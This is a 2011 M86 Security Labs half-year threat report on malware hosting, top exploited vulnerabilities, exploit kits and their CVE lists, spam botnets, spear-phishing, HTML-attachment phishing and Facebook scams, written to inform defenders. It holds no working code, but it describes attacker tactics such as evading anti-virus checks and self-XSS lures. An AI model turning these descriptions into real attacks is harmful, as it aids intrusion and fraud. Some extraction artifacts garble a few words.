Security Labs Report January – June 2011 Recap CONTENTS

Introduction 3

Review of First Half (January to June) 2011 3

Key Points 3

Security Lab Statistics 4

Web Statistics 4

Spam Statistics 6

Spam 6

Spam Categories 7

Malicious Spam 8

Targeted Attacks 10

Combined Attacks: Adobe Flash and Microsoft Office Documents 10

Blended Threats and Exploit Kits 12

Meet the Exploit Kits 14

Popularity of Free Domains in Malicious Attacks 18

Phishing via HTML Attachments 20

Rustock Takedown 21

Facebook Scams Surge 22

Recommendations 27

Security Labs Report Page 2 INTRODUCTION

The M86 Security Labs team prepared this report, which covers key trends and developments in over the last six months.

M86 Security Labs is a group of security analysts specializing in email and Web threats, from spam to . They continuously monitor and respond to Internet security threats. The Security Labs’ primary purpose is to provide a value-added service to M86 customers as part of product maintenance and support. This service includes frequent updates to M86’s unique, proprietary anti-spam technology, SpamCensor, as well as Web and vulnerability updates to the M86 Secure Web Gateway products. The updates allow M86 customers to proactively detect and block new and emerging exploits, threats and malware.

M86 Security Labs analyzes spam, and malware activity, and follows Internet security trends. The team is recognized in the industry and regularly reports on these issues, including newly-discovered vulnerabilities and the exploits using them “in the wild.” Every day, the Security Labs team analyzes millions of distinct email messages, infected websites and malware reports. The results of these analyses, correlated with Web exploit and vulnerability research, provide M86 with a unique vantage point on Internet threats.

Data and analysis from M86 Security Labs is continuously updated and always accessible online at: http://www.m86security.com/labs.

You can find us on Twitter at: http://twitter.com/m86labs.

REVIEW OF FIRST HALF (JANUARY- JUNE) 2011

During this period, Web-based threats continued to grow more sophisticated. However, email threats such as spam decreased markedly following the takedown of major spam operations.

Key Points nnMany of the vulnerabilities targeted today are found in the Adobe and Java platforms. This highlights the fact that these applications often remain unpatched. Organizations and individuals should ensure that these software applications are promptly. nnAlthough spam volumes have declined since the closure of Spamit.com and takedown of the Rustock botnet, spam remains a problem for most organizations. nnThe volume of malicious spam has returned to previous levels. Attackers continue to craft more legitimate looking messages in order to coax users into executing malicious files. nnCybercriminals continue to experiment with combined attacks, evidenced by the recent spate of “spear-phishing” (targeted) attacks that used Microsoft Office document files with embedded shockwave files that exploit vulnerabilities in Adobe Flash. nnThere has been an increase in phishing attacks that include an HTML attachment, which is used to bypass anti-spam and anti-phishing filters in the browser. nnFacebook scams surged in the first half of 2011, as cybercriminals experimented with different ways to dupe social networkers into helping them earn a profit. One scam led users to trojans and fake anti-virus software for the Mac.

Security Labs Report Page 3 SECURITY LABS STATISTICS

Web Statistics World Malware Map Where is most malicious code being hosted?

Figure 1: Geo-location of Malicious Code Hosted on Servers in the First Half of 2011

The U.S. remained at the top of the list of locations where malicious code is hosted. However, the percentage decreased nearly 10% in the first half of 2011 to 32.3%, compared to 42.1% in the second half of 2010. China, often believed to be one of the major hosts of malicious code, saw its share double, up from 6.4% in the second half of 2010 to 12.7% in the first half of 2011. Since hosting the 2010 FIFA World Cup, South Africa dropped significantly, registering at only 0.3% in the first half of 2011, down from a high of 5.28% in the second half of 2010. If any correlation can be made between locations of malicious code hosts and countries that host major sporting events, the U.K. looks primed to be the next target, as the 2012 Olympic Games will be hosted there. Our analysis showed an increase already starting: the U.K share rose from 3.34% in the second half of 2010, up to 5.19% in the first half of 2011. We believe that this trend will continue as we get closer to the event in 2012.

Top 15 Most-observed Vulnerabilities During the first half of 2011, anonymous feedback on observed threats from M86 filtering installations showed most threats were based on the following vulnerabilities:

VULNERABILITY DISCLOSED PATCHED 2H 2010 +/- 1. Microsoft Internet Explorer RDS ActiveX 2006 2006 1 - 2. Office Web Components Active Script Execution 2002 2002 2 - 3. Adobe Reader util.printf() JavaScript Func() Stack Overflow 2008 2008 7 h4 4. Adobe Acrobat and Adobe Reader CollectEmailInfo 2007 2008 5 h1 5. Adobe Reader media.newPlayer 2009 2009 10 h5 6. Adobe Reader GetIcon JavaScript Method Buffer Overflow 2009 2009 6 - 7. Internet Explorer Table Style Invalid Attributes 2010 2010 - - 8. Adobe Reader javascript this.spell.customDictionaryOpen 2009 2009 - - 9. Adobe Reader getAnnots() Javascript Function Remote Code Execution 2009 2009 - - 10. Java WebStart Arbitrary Command Line Injection 2010 2010 15 5 11. Java Plugin Web Start Parameter 2010 2010 - - 12. Microsoft Internet Explorer Deleted Object Event Handling 2010 2010 8 i4 13. Real Player IERPCtl Remote Code Execution 2007 2007 4 i9 14. Microsoft Video Streaming (DirectShow) ActiveX 2007 2009 3 i11 15. Microsoft IE STYLE Object Invalid Pointer Reference 2009 2009 14 i1

Security Labs Report Page 4 The table on the previous page includes the placements from the second half of 2010, and the change in placement for each vulnerability. From the second half of 2010 to the first half of 2011, Adobe-based vulnerabilities rose in importance. In fact, Adobe vulnerabilities account for six out of the top 10 items observed. Another interesting fact is that Java-based vulnerabilities broke into the top 11. The “Java WebStart” vulnerability moved appreciably, up from number 15 to number 10 in only six months. As with Flash and Acrobat, Java-based vulnerabilities are of concern due to the universal use of this technology and the lack of updating or patching for many Java installations. A multitude of browsers are available, and new browser updates are being introduced regularly. Many browser vendors have adopted a rapid- release development cycle in order to deliver new features, enhancements and security updates to users. This process will further push cybercriminals to find vulnerabilities in Adobe products like Flash and Acrobat along with Oracle’s Java. Targeting a single software application, that is used with all browsers, requires less effort.

Top 10 Most Popular Exploit Kits In addition to tracking the most-observed vulnerabilities in the wild, we track the most popular exploit kits observed in the wild:

EXPLOIT/TOOLKITS 2H 2010 +/- 1. Neosploit 7 h6 2. Phoenix 2 - 3. Blackhole - - 4. Incognito - - 5. Eleonore 1 i4 6. Bleeding Life - - 7. SEO Sploit 8 h1 8. CrimePack - - 9. Intoxicated - - 10. Siberia - -

Our analysis suggests that most exploit kits last for a year on average. For instance, our second half 2010 report showed that the Eleonore exploit kit was the most popular kit used by cybercriminals. However, it has not been updated by the original developers in more than six months. The current instances of this exploit kit in the wild are actually a mutation of the latest “released” versions, generated by anonymous cybercriminals. Another interesting exploit kit, Incognito, was inspired by the Neosploit team. The first version of this kit was created from the Fragus exploit kit, which we mentioned in the previous report. The author of this kit upgraded it, added new exploits and implemented new obfuscation techniques. The latest version of the exploit kit was converted into a Malware-as-a-Service offering. It allows cybercriminals to control settings via a central control panel. These continuous updates are key factors for ensuring longer shelf lives of exploit kits. Like any software application, if they are not updated regularly, they become stale. A detailed overview of some of these exploit kits can be found later in this report.

Security Labs Report Page 5 Spam Statistics Spam Volume Index In 2011, the volume of spam remains subdued compared to historical levels, reflecting substantial changes in the underground spamming ecosystem. Spam volume dipped sharply towards the end of 2010, as spammers were affected by a series of botnet disruptions and affiliate program closures.

M86 Security Spam Volume Index (SVI)

7000

6000

5000

4000

3000

2000

1000

0 Jul 2009 Jul 2010 Jan 2011 Jan 2010 Jun 2009 Jun 2011 Jun 2010 Oct 2009 Oct 2010 Apr 2010 Apr 2011 Sep 2009 2009 Sep 2010 Feb 2010 Sep 2011 Feb Dec 2009 Dec Dec 2010 Dec Aug 2009 Aug 2010 Nov 2009 2009 Nov 2010 Nov Mar 2010 Mar 2011 May 2010 May 2011

Figure 2: M86 Security Labs’ Spam Volume Index (SVI)

Our proxy for spam volume movements is the M86 Security Labs Spam Volume Index (SVI), which tracks changes in the volume of spam received by a representative bundle of domains. By June 2011, the SVI stood at around 2,000, which is less than half of the SVI during most of 2010. Several factors led to the slump in volume: nnMost significantly, Spamit.com was shut down in late September. Spamit.com was an underground affiliate program used by several spamming botnets. It was closely linked to the “Canadian Pharmacy” and other brands of bogus online pharmacies. nnControl servers for the Pushdo botnet (and its Cutwail spamming component) were disrupted in August 2010. nnThe Mega-D botnet slowly ground to a halt as law enforcement authorities identified and pursued the operator in late 2010. nnThe Bredolab botnet, which often installed spamming malware, was disrupted in October 2010. nnThe Rustock botnet, already seriously impacted by the Spamit closure, was disabled by Microsoft in March 2011. nnCorrespondingly, spam as a percentage of total inbound email dropped from approximately 90% in September 2010 to 77% in June 2011; however it still remains a substantial issue for organizations. Although spam volume is much lower than last year, it is growing once again. In the last few months we’ve seen an increasing trend in the SVI index.

Spam Botnets Where the Spam Comes From The bulk of spam is emitted from botnets, which are networks of computers compromised by malware. M86 Security Labs monitors the spam output from major botnets by observing infected machines in a closed environment, and comparing behavior with incoming spam feeds to gauge the activity levels of each botnet. The spamming botnets are constantly in flux, reflecting the nature of the underground marketplace. Botnets morph and become obsolete, are replaced, taken down, and upgraded in response to market forces, competition and law enforcement. As of June 2011, eight botnets were responsible for 93% of spam monitored by M86 Security Labs. In the aftermath of the Spamit and Rustock closures, other smaller botnets, notably Donbot and Xarvester, have increased their market share. The chart below depicts spam by spambot type as percentage of total spam.

Security Labs Report Page 6 Top Spam Botnets: Jun 2011 Other FesD 6.9% 2.1% Cutwail3 Donbot 5.3% 22.4%

Grum 9.3%

Xarvester 11.8% Lethic 17.4%

Maazben 12.2% Cutwail1 12.5%

Figure 3: Spam by Spambot Type for June 2011

Spam Categories A Shakeup in the Makeup of Spam Categories The shakeup of the spam ecosystem also led to big changes in the types of programs being promoted by spam. Pharmaceutical spam has dropped markedly to just 39% from more than 80% at the beginning of the year. Other categories, notably dating, replicas and gambling spam have risen to fill the gap. Phishing—as a percentage of spam—has now dropped to very low levels, around 0.1% or 1 in 1,000 spam messages.

Spam Categories: Jun 2011

Pharma, 39.0%

Other, 1.5% Malware, 0.2%

Adult, 0.4% Scams, 0.4%

Diplomas, 0.4%

SoBware, 0.7%

Gambling, 15.7%

Da.ng, 21.4%

Replicas, 18.5%

Figure 4: Spam Categories for June 2011

These statistics reflect the changing nature of the affiliate programs that botnet operators use to earn money. The model works like this: sign up with an affiliate program, promote the product/website/links, and earn money for every successful sale.

Security Labs Report Page 7 Spam Categories: Jan -­‐ Jun 2011

100.0%

90.0%

80.0%

70.0%

60.0% Pharma

50.0% Replicas

40.0% Da

20.0%

10.0%

0.0% 2/01/2011 2/02/2011 2/03/2011 2/04/2011 2/05/2011 2/06/2011

Figure 5: Spam Categories Line Graph from January 2011 to June 2011

The decline in pharmaceutical spam is interesting, because this has been a dominant spam category for years. Several factors are at play. First is the closure of Spamit, which was linked to the Glavmed affiliate program, one of the largest pharmaceutical affiliate programs. Second, the legal action taken by Microsoft during the Rustock takedown sent promoters of illegitimate pharmaceutical websites a strong message, perhaps making this option less attractive for spammers. Third, it may be that competing affiliate programs in other categories are now more financially attractive for the spammers.

Malicious Spam Attachments and Blended Threats The proportion of spam with malware attachments has risen since the beginning of the year, although this merely represents a return to more “normal” activity after an unusually quiet November-to-March period. Malicious spam can spike upwards sharply, and at times these spikes can represent 5% or more of total spam.

Spam with Malware A/achments: % of Total Spam 7.0%

6.0%

5.0%

4.0%

3.0%

2.0%

1.0%

0.0%

4-­‐Jul-­‐10 4-­‐Aug-­‐10 4-­‐Sep-­‐10 4-­‐Oct-­‐10 4-­‐Nov-­‐10 4-­‐Dec-­‐10 4-­‐Jan-­‐11 4-­‐Feb-­‐11 4-­‐Mar-­‐11 4-­‐Apr-­‐11 4-­‐May-­‐11 4-­‐Jun-­‐11

Figure 6: Spam with Malware Attachments: Percent of Total Spam

Security Labs Report Page 8 Many of the campaigns we observed this year contained malware that downloads fake anti-virus software.

Figure 7: Fake Anti-virus Downloaded Through Malware Spread Via a Spam Campaign

In addition, we observed malicious spam campaigns that included PDF attachments—such as the one used in the campaign in Figure 9— claiming to be a receipt from Warner Music:

Figure 8: Malicious PDF Spam Campaign Attempting to Exploit the Adobe Geticon Vulnerability (CVE-2009-0927)

Security Labs Report Page 9 Targeted Attacks Why Email as a Threat Vector Shouldn’t Be Ignored The majority of attacks now originate from the Web. Whether these attacks infiltrate through legitimate website infections, malvertising or drive-by downloads, they have all contributed to this growing trend. As a result, email as a threat vector has been given less attention, despite the fact that email incidents continue to cause significant problems. One example from the first half of 2011 is the targeted attack against RSA, the security division of EMC. This email-based attack received little attention in comparison to other types of attacks on high-profile organizations such as Sony and government sites. RSA was the victim of a spear-phishing attack, which originated as an email to specific staff members claiming to be about the 2011 recruitment plan. This email contained an Excel file as an attachment. This file was not your average spreadsheet. It contained a Flash file that was used to exploit a zero- day vulnerability in Adobe Flash on the victim’s system. This attack had far-reaching implications, because RSA is the provider of two-factor authentication to defense contractors. One contractor, Lockheed Martin, was attacked months after this targeted attack. Oak Ridge National Laboratory, a nuclear research facility funded by the United States Department of Energy, was also a victim of a targeted attack in April of 2011. The attackers crafted a spear-phishing email disguised to look as though it had come from the human resources. The email contained a blended threat—a link to a malicious Web page—which exploited a vulnerability in Microsoft’s Internet Explorer. Out of the 57 employees that clicked on the link, only two were infected, but this turned out to be more than enough to allow cybercriminals to exfiltrate a few hundred megabytes of data from the facility. The data breach that occurred at email marketing firm Epsilon may have also been the result of a spear-phishing attack. Organizations continue to rely on email communications; hence the email vector is one that should be watched closely for attacks that involve social engineering. Companies must continue to evaluate how they communicate sensitive information such as employee benefits and recruitment plans. Internal communications must be designed well enough to allow users to discern the difference between a legitimate company communication and one crafted by a cybercriminal.

Combined Attacks: Adobe Flash and Microsoft Office Documents Would You Like a .swf (Shockwave File) with That? During the first half of this year, we began observing a new type of attack that relies on vulnerabilities in Adobe Flash and Microsoft Office files. The attacker leverages vulnerabilities found in Adobe Flash by inserting an Adobe Shockwave (.swf) file into a Microsoft Word document or Microsoft Excel spread sheet. The two vulnerabilities involved are:

COMMON VULNERABILITY DESCRIPTION ENUMERATION (CVE) CVE-2011-0609 […] allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted Flash content, as demonstrated by a .swf file embedded in an Excel spreadsheet, and as exploited in the wild in March 2011 CVE-2011-0611 […] allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted Flash content; as demonstrated by a Microsoft Office document with an embedded .swf file that has a size inconsistency in a "group of included constants," object type confusion, ActionScript that adds custom functions to prototypes, and Date objects; and as exploited in the wild in April 2011.

CVE-2011-0609 was the zero-day vulnerability used in the targeted attack against RSA in March of this year. Vulnerabilities targeting Adobe’s Flash platform are extremely common. Organizations often send documents to employees about various company policies and initiatives. By crafting Office documents with added shockwave files, and sending them out via spear-phishing attacks, cybercriminals can potentially wreak havoc on an organization. Here is an example of a malicious document that contains embedded Flash:

Figure 9: Flash 10 Information Found at 0x0A11

Security Labs Report Page 10 Figure 10: Flash Embedded at 0x02E08

We have seen these embedded Flash-in-Office files exploited in the wild over the last few months. We have also observed similar exploits written in the Metasploit Framework:

Figure 11: CVE-2011-0609 in the MetaSploit Framework Figure 12: CVE-2011-0611 in the MetaSploit Framework

Many security solutions (such as anti-virus scanners) aren’t fully capable of separating the malicious Flash component embedded in the Office files, making them difficult to analyze. We believe that this trend of combining malicious shockwave files into Microsoft Office files will continue. We expect more vulnerabilities to be found and exploited in both Office and Flash platforms.

Security Labs Report Page 11 Blended Threats and Exploit Kits A Match Made in Heaven Scammers have found a few social engineering sweet spots in recent months. One common tactic preys on those who sympathize with victims of natural disasters around the world. The earthquake in Japan that led to tsunamis and a nuclear meltdown was exploited in SEO poisoning attacks, social networking scams and malicious spam campaigns. By using sensational headlines, scammers coax users into clicking on the links in their blended threat attacks, which lead to malicious Web pages that can exploit client-side vulnerabilities.

Figure 13: Malicious Spam Campaign Leads to Malicious Page That Exploits Client-side Vulnerabilities

Another variant of this campaign was spoofed to look as though it had come from the social networking site, Twitter:

Figure 14: Fake Twitter Notification Informs User They Have New ‘Information’ Messages Regarding Japan’s Nuclear Crisis

Security Labs Report Page 12 Malicious LinkedIn Spam In early June, we began to observe a blended threat spam campaign masquerading as a realistic-looking notification from LinkedIn. While this isn’t the first time we’ve seen spoofed social networking messages delivered in malicious spam campaigns, spammers continue to modify these messages to look more and more legitimate.

Figure 15: Malicious LinkedIn Blended Threat Campaign

In this case, users clicking on the “confirmation” button were led to a server hosting the Blackhole Exploit Kit, which then attempted to exploit vulnerabilities in Java, PDF readers and other client-side software applications

Figure 16: Blackhole Exploit Kit Statistics Page

Java vulnerabilities continue to lead the way, accounting for 81% of the successful exploits from this campaign.

Security Labs Report Page 13 Meet the Exploit Kits Analysis of Three of the Top Exploit Kits In this section, we highlight the features of three top exploit kits and explain why cybercriminals use these particular kits.

NeoSploit (version 4) The NeoSploit exploit kit has been around since 2007. It was abandoned after the release of version 3 due to financial problems. However, it made its triumphant return in early 2010. Over the last several months, the Neosploit exploit kit moved up to become the most popular exploit kit, which may be a result of several features that gave it an advantage over competitors. The NeoSploit team was the first to create an exploit kit that functions as a cloud-based service. The tool also manages to exploit a higher percentage of machines than the rest of the exploit kits we have analyzed, thanks to its dynamic obfuscation techniques.

Figure 17: NeoSploit Administrative Panel – Daily Stats

Figure 18: NeoSploit Exploit Page Figure 19: Original Gmail Source Code

For more in-depth coverage of the Neosploit exploit kit see our blog post, “Shedding Light on the Neosploit Exploit Kit.”

Security Labs Report Page 14 Phoenix Exploit Kit (version 2.7) The Phoenix Exploit was the only exploit kit that remained in our top five exploit kit report after six months. Likely, this is a result of the fact that the author of the Phoenix Exploit Kit updates his product after several months and provides new exploits and obfuscation techniques to his customers. Some old exploits are purged. The latest version of the Phoenix Exploit Kit, version 2.7, contains the following exploits:

EXPLOIT/VULNERABILITY CVE Java for Business JRE Trusted Method Chaining Remote Code Execution* CVE-2010-0840 Windows Help and Support Center Protocol Handler CVE-2010-1885 Integer overflow in the AVM2 abcFile parser in Adobe Flash Player CVE-2009-1869 Integer overflow in Adobe Flash Player 9 CVE-2007-0071 IEPeers Remote Code Execution CVE-2009-0806 Internet Explorer Recursive CSS Import CVE-2010-3971 PDF Exploit - collab. collectEmailInfo CVE-2007-5659 PDF Exploit - util.printf CVE-2008-2992 PDF Exploit - collab.geticon CVE-2009-0927 PDF Exploit - doc.media.newPlayer CVE-2009-4324 PDF Exploit - LibTIFF Integer Overflow CVE-2010-0188

* Indicates a new addition

This kit is heavy on the Adobe vulnerabilities, with seven out of the 11 vulnerabilities focusing on Adobe Reader and Acrobat, as well as Adobe Flash.

Figure 20: Live Control Panel of Phoenix Exploit Kit version 2.7

As long as the author of the Phoenix Exploit Kit continues to create new versions of this pack, we expect to see it used by cybercriminals and remain at the top of the most popular exploit kits chart.

Security Labs Report Page 15 Blackhole Exploit Kit The Blackhole exploit kit is the rising star among the cybercriminal toolkits. Like other kits, it uses common exploits:

EXPLOIT/VULNERABILITY CVE Java for Business JRE Trusted Method Chaining Remote Code Execution* CVE-2010-0840 Java argument injection vulnerability in the URI handler in Java NPAPI plugin CVE-2010-1423 Java Unspecified vulnerability in the Java Deployment Toolkit component in Oracle Java SE CVE-2010-0886 Java JRE MixerSequencer Invalid Array Index Remote Code Execution CVE-2010-0842 Java buffer overflows in the Deployment Toolkit ActiveX control in deploytk.dll CVE-2009-1671 Windows Help and Support Center Protocol Handler Vulnerability CVE-2010-1885 PDF Exploit - collab. collectEmailInfo CVE-2007-5659 PDF Exploit - util.printf CVE-2008-2992 PDF Exploit - collab.geticon CVE-2009-0927 PDF Exploit - doc.media.newPlayer CVE-2009-4324 PDF Exploit - LibTIFF Integer Overflow CVE-2010-0188

* Indicates a new addition

Figure 21: Live Control Panel of the Blackhole Exploit Kit

Note that the Blackhole kit comes equipped to exploit numerous vulnerabilities for Oracle’s Java platform (Figure 21). Today, the most successful vector of attack is the Java platform.

Security Labs Report Page 16 Underground Anti-virus Checking Sites Another interesting feature used in the new exploit kits is the full integration with underground anti-virus checking sites.

Figure 22: Anti-virus Checking Included in the Blackhole Exploit Kit

The first toolkit to integrate underground anti-virus checking was the Siberia exploit kit. Figure 22 shows that the Blackhole exploit kit now comes equipped with this same anti-virus checking.

Figure 23: Underground Anti-virus Checking site, Virtest

Cybercriminals can create an account on underground anti-virus checking sites, such as scan4you and Virtest, as the Blackhole exploit kit integrates the login function into the kit. By going through this extra step, cybercriminals can ensure that malware is not being detected by the latest anti-virus solutions.

Security Labs Report Page 17 Popularity of Free Domains in Malicious Attacks Some Cybercriminals Pinch Pennies While Deploying Attacks Over the last six months, we’ve seen a dramatic increase in the popularity of free domain registration services as the hosts for malicious attacks. There has been a 250% increase in the usage of these sites since we began tracking them in the second half of 2010. Most cybercriminals prefer to follow the K.I.S.S. principal: keep it simple, stupid. In the case of domain name providers, you can’t do any better than free. While we’ve seen this increase in malicious domains on free domain registrars, we continue to find that legitimate, benign content is being hosted on sites using the same free domain providers. This makes the obvious approach of blacklisting the entire top level domains unworkable.

Figure 24: Free Domain Registration Page on .cz.cc

Other free popular domains used for malware hosting, such as cx.cc, went from barely noticeable in the second half of 2010 to prominent in the first half of 2011.

Security Labs Report Page 18 Figure 25: Free Domain Registration Page on cx.cc Offers Free Hosting with PHP and MySQL Support

The cx.cc domain registrar provides cybercriminals with an added value of free hosting services, which includes PHP and MySQL support. This added bonus becomes very appealing to cybercriminals looking to host malware, including exploit kits. Other .cc domains, such as co.cc, are being leveraged in Facebook scam campaigns, showing that the trend of using free domain registrars is one that extends across the spectrum of cybercriminals.

Security Labs Report Page 19 Phishing Via HTML Attachments Local Files Bypass Anti-spam and Browser Anti-phishing Methods As we noted earlier in this report, phishing as a percentage of total spam has dropped to low levels. One ploy phishers have adopted is to attach an HTML file to the spam message (as opposed to the HTML being part of the email body). This better avoids anti-spam filters and anti-phishing filters built into browsers. The HTML attachment, stored locally, is opened in the user’s browser. A form is then presented which is sent to a remote Web server using a POST request.

Figure 26: Phishers Attaching HTML File for Bank of America to Evade Anti-spam Filters

Once the user opens the HTML file, they are presented with the locally-stored page, which is used to obtain the user’s credentials by asking him/her to ”restore” their account.

Figure 27: Phishing for PayPal Credentials, Local Page is Undetected by the Browsers Anti-phishing Filters

Security Labs Report Page 20 Rustock Botnet Takedown The Demise of the King of Spams On March 16, the Rustock botnet ground to a halt when the Microsoft Digital Crimes Unit, in conjunction with United States authorities, disabled the botnet’s infrastructure. The takedown was a result of a long investigation and resulted in the seizure of many control servers located in the US. Rustock was a major botnet over the last few years. At times during 2010, it was responsible for more than 50% of the spam observed by M86 Security Labs. Estimates of its size ranged up to one 1 million infected nodes. Rustock almost always promoted pharmaceutical products, notably via the infamous “Canadian Pharmacy” brand websites. In fact, Rustock’s spam output declined substantially prior to the takedown. In September 2010, Rustock’s spam output dipped dramatically following the closure of Spamit.com, an underground spamming affiliate program linked to Glavmed and its Canadian Pharmacy “brand”. When Microsoft finally shut down the botnet in mid-March, Rustock’s spam output was only at around 2-3% of total spam. Its final disappearance, then, did not cause a huge impact in global spam levels.

Rustock: Percentage of Total Spam

60.0

50.0

40.0

30.0

20.0 Percent of Total Spam Total of Percent

10.0

0.0

Jul-­‐10 Jan-­‐10 Feb-­‐10 Mar-­‐10 Apr-­‐10 May-­‐10 Jun-­‐10 Aug-­‐10 Sep-­‐10 Oct-­‐10 Nov-­‐10 Dec-­‐10 Jan-­‐11 Feb-­‐11 Mar-­‐11

Figure 28: Rustock’s Decline Following the SpamIt.com Closure and its Eventual Takedown by Microsoft

Nevertheless, the demise of Rustock is a significant victory. This huge spamming machine, capable of billions of spam messages daily, was allowed to operate largely unhindered for years. At this time, Microsoft is still attempting to pursue the individuals behind Rustock. This action sends a strong signal to spammers that their actions are not going to be tolerated, and they must be held accountable.

Security Labs Report Page 21 Facebook Scams Surge More Money, More Malware In the first half of 2011, social networking scams reached an all-time high. The various methods deployed by scammers showcased the nature of experimentation. Cybercriminals were trying to find a way to convince more users to click on scam links.

‘Likejacking’

Figure 29: Facebook User That Fell for a ‘Likejacking’ Scam About Pop-star Justin Bieber

At the beginning of the year, so-called “likejacking” scams (a variation of the term “”) were used to hijack user clicks on fake YouTube pages to spread the scam across Facebook news feeds. These likejacking scams ran the gamut, mostly focusing on outrageous or interesting headlines, some of which involved celebrities and pop-stars, such as the “I can’t believe a GIRL did this because of Justin Bieber” likejacking scam.

Figure 30: Fake YouTube page. Clicking on the “Play” Button Will Result in the Click Being ‘Likejacked’

‘Photo-tagging’ In April, scammers began leveraging Facebook photos and albums to perform mass photo-tagging. They tagged hundreds of users in photos with a link in the description text that pointed them to rogue Facebook applications. Once installed, these applications would then tag the victims’ friends in the same photo.

Figure 31: Facebook Friends are Tagged in a Photo, Encouraging Users to Click on a Link

Security Labs Report Page 22 ‘Commentjacking’ In May, scammers started leveraging the Facebook comments forms, released to website owners who wanted to integrate a commenting system on their blogs and websites. Scammers would place the Facebook comments forms on their scam pages and socially engineer users into leaving comments.

Figure 32: Facebook User is Tricked into Submitting a Comment “I Love Southwest” in Order to Spread This Scam

Some of the scams offered users free airline tickets. Others revealed content, such as a video unveiling Apple’s new iPhone, the iPhone 5:

Figure 33: Facebook User is Asked to Verify CAPTCHA Terms Like ‘Crazy’ and ‘Incredible’

Rogue Application Features There was a variation of scams used in the first half of 2011. Some used built-in features in the Facebook application platform in order to push scams out en masse.

Figure 34: Facebook Application Requests Access to Photos and Videos to Spread the Photo-tagging Scam

Security Labs Report Page 23 A lesser-known feature of the Facebook application platform includes access to the Facebook Chat feature:

Figure 35: Rogue Application is Granted Access to Facebook Chat

This turned out to be a boon for scammers, who began using chat to direct users to their scam sites.

Figure 36: Facebook Chat Message Linking to a Scam Site

Self XSS (Cross-site Scripting) In May, scammers found a way to use a cross-site scripting vulnerability via Facebook. This required the user to paste JavaScript code into their browser’s address bar. Scams varied from Osama Bin Laden’s death video to profile stalkers to adding a Dislike button.

Figure 37: Facebook Page Encourages Users to Paste JavaScript Code into Their Browser’s Address Bar

Security Labs Report Page 24 Surveys: How Scammers Make Their Money All of these scams lead Facebook users to pages asking them to complete a survey. The survey is presented as a “requirement” for getting access to videos, free airline tickets or enabling features on Facebook such as the Dislike button.

Figure 38: Scammers Convince Users That They Need to Verify They are Humans by Filling Out a Survey

Each user that completes one of these surveys results in some payout from an affiliate program. We do not know for sure how much each affiliate program pays the scammers, but the mere fact that these scams continue indicates that the money must be sufficient enough to keep them in business.

Malware Campaign Spreads It was only a matter of time before these scam campaigns resulted in more than users being duped into completing surveys. Near the end of May, a malware campaign surrounding the allegations against former IMF boss, Dominque Strauss-Kahn began to spread. The campaign claims to link users to a video of the alleged sexual assault against a hotel maid in New York.

Figure 39: IMF Scam Campaign Directs Users to Malicious Downloads for Both Windows and Mac Users

Security Labs Report Page 25 Users that clicked through were directed to a fake YouTube site. Windows users would be directed to a download of a malicious executable claiming to be a Flash Player installation file. Mac users would be directed to a page pushing the fake anti-virus known as MacDefender.

Figure 40: Facebook Scam Leads to MacDefender Scareware Page for Mac Users

This malware campaign spread for 72 hours before it was wiped clean from Facebook profiles, but not before thousands of Facebook users had already fallen for it. While this malware campaign was a one-off in a sea of survey scams, it is a cautionary tale. Social networking scammers are no longer just content with making money from surveys. Social engineering to entice users to fill in surveys is just the beginning, and this campaign showed why Facebook and other social networks could prove to be a utopia for cybercriminals.

Security Labs Report Page 26 RECOMMENDATIONS

M86 Security recommends the following security best practices to help reduce your exposure to threats and scams: nnReview your current security products. Armed with the latest threat information, re-evaluate the security products that are being used in your organization or at home. Ask your current vendors the tough questions about exactly what they do to detect and block these threats. The solutions you use should have a solid base of reactive controls in anti-virus and URL scanning, along with proactive technologies such as real-time code analysis. Consider testing products against each other, and ensure the vendors are investing in threat research. nnStay up to date. Keep Web browsers, add-ons/extensions, and desktop applications up to date with their latest versions. We have seen time and again that attacks target vulnerabilities found in old versions of Web browsers or applications. Organizations are not blocking the latest spam and Web threats simply because their products are not up to date. While being completely up to date with the latest patches helps to protect you and your end users from patched vulnerabilities, you will still need to remain on guard for the un-patched, zero-day vulnerabilities. nnEducation is paramount. Teaching users about best practices for their everyday Internet usage is a key part of a security policy. Show them examples of social networking scams. Explain how easy it is for a computer to get infected. Encourage them to keep their applications up to date (see above). Above all else, they should be wary about clicking on any links in email, and pay close attention to the links found in search engine results and those posted by contacts on social networks. nnConsider using browser add-ons or extensions for an additional layer of security. We recommend using the NoScript extension for Mozilla Firefox, which limits the execution of JavaScript code. We also suggest using extensions that will display shortened URLs as their full URLs, making it easier to know the actual destination URL. M86 Security and other security vendors provide free tools for users to install on their personal or home computers—typically the most vulnerable. One such tool is SecureBrowsing, which analyzes links from search engine results or on Web pages to gauge their malicious nature. It also works with shortened URLs such as those found in Twitter. nnProtect your Social Networking accounts. Facebook and Twitter have added the option to use HTTPS for their services. We strongly recommend that you enable this setting on both services. To enable HTTPS for Facebook, visit http://www.facebook.com/editaccount.php and you will find the check box to Browse Facebook on a secure connection. To enable HTTPS for Twitter, visit http://twitter.com/settings/account and check the Always use HTTPS box. We also highly recommend enabling Login Notifications on Facebook, which can also be found in the same section as above.

ABOUT M86 SECURITY TRY BEFORE YOU BUY M86 Security is the global expert in real-time threat protection and the industry’s leading Secure Web Gateway provider. The company’s hardware, virtual appliance, software, and Software as a Service (SaaS) solutions for Web M86 Security offers free product and email security protect more than 25,000 customers and 26 million users worldwide. M86 products use patented trials and evaluations. real-time code analysis and behavior-based malware detection technologies as well as threat intelligence from M86 Simply contact us or visit: Security Labs to protect networks against new and advanced threats, secure confidential information, and ensure www.m86security.com/ regulatory compliance. The company is based in Irvine, California with international headquarters in London and downloads. development centers in California, Israel, and New Zealand. For more information about M86 Security, please visit: www.m86security.com.

Corporate Headquarters International Headquarters Asia-Pacific 8845 Irvine Center Drive Renaissance 2200 Suite 3, Level 7 100 Walker St. Irvine, CA 92618 Basing View, Basingstoke North Sydney NSW 2060 United States Hampshire RG21 4EQ Australia United Kingdom Phone: +1 (949) 932-1000 Phone: +44 (0) 1256 848 080 Phone: +61 (0)2 9466 5800 Fax: +1 (949) 932-1086 Fax: +44 (0) 1256 848 060 Fax: +61 (0)2 9466 5899

© Copyright 2011 M86 Security. All rights reserved. M86 Security is a registered trademark of M86 Security. All other product and company names mentioned herein are trademarks or registered trademarks of their respective companies.